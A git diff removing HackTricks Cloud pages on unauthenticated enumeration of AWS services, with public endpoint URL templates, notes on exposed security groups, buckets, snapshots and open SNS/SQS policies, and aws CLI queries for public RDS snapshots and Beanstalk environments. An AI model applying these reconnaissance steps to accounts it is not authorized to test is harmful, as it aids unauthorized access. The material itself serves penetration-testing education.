-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md deleted file mode 100644 index 8ea519bad..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ /dev/null @@ -1,65 +0,0 @@ -# AWS - Elastic Beanstalk Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information check: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### Web vulnerability - -Note that by default Beanstalk environments have the **Metadatav1 disabled**. - -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** - -### Insecure Security Group Rules - -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. - -### Publicly Accessible Load Balancer - -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. - -### Publicly Accessible S3 Buckets - -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. - -### Enumerate Public Environments - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md deleted file mode 100644 index 0e6f5efc9..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ /dev/null @@ -1,38 +0,0 @@ -# AWS - Elasticsearch Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://vpc-{user_provided}-[random].[region].es.amazonaws.com -https://search-{user_provided}-[random].[region].es.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md deleted file mode 100644 index 6cb420ff7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - IoT Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -mqtt://{random_id}.iot.{region}.amazonaws.com:8883 -https://{random_id}.iot.{region}.amazonaws.com:8443 -https://{random_id}.iot.{region}.amazonaws.com:443 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md deleted file mode 100644 index 0ea3e2d46..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Kinesis Video Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.kinesisvideo.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md deleted file mode 100644 index aac576119..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - Lambda Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Function URL - -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. - -### Public URL template - -``` -https://{random_id}.lambda-url.{region}.on.aws/ -``` - -### Get Account ID from public Lambda URL - -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md deleted file mode 100644 index 1d1e83f04..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - Media Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.mediaconvert.{region}.amazonaws.com -https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel -https://{random_id}.data.mediastore.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md deleted file mode 100644 index 1c748c6d4..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - MQ Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Port - -### **RabbitMQ** - -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` - -### ActiveMQ - -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template - -``` -https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ -ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md deleted file mode 100644 index 0de37352c..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - MSK Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public Port - -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). - -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template - -``` -b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com -{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md deleted file mode 100644 index fa2b1ba73..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - RDS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -## Public Port - -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. - -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: - -```bash -# Public RDS snapshots -aws rds describe-db-snapshots --include-public - -## Search by account ID -aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' -## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) -## To share a RDS encrypted snapshot you need to share the KMS key also with the account - - -# From the own account you can check if there is any public snapshot with: -aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] -## Even if in the console appear as there are public snapshot it might be public -## snapshots from other accounts used by the current account -``` - -### Public URL template - -``` -mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 -postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md deleted file mode 100644 index a6e2a448a..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Redshift Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -{user_provided}...redshift.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md deleted file mode 100644 index 416a48e0e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md +++ /dev/null @@ -1,47 +0,0 @@ -# AWS - SNS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information about SNS check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### Open to All - -When you configure a SNS topic from the web console it's possible to indicate that **Everyone can publish and subscribe** to the topic: - -
- -So if you **find the ARN of topics** inside the account (or brute forcing potential names for topics) you can **check** if you can **publish** or **subscribe** to **them**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md deleted file mode 100644 index 5926225b3..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# AWS - SQS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information about SQS check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### Public URL template - -``` -https://sqs.[region].amazonaws.com/[account-id]/{user_provided} -``` - -### Check Permissions - -It's possible to misconfigure a SQS queue policy and grant permissions to everyone in AWS to send and receive messages, so if you get the ARN of queues try if you can access them. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
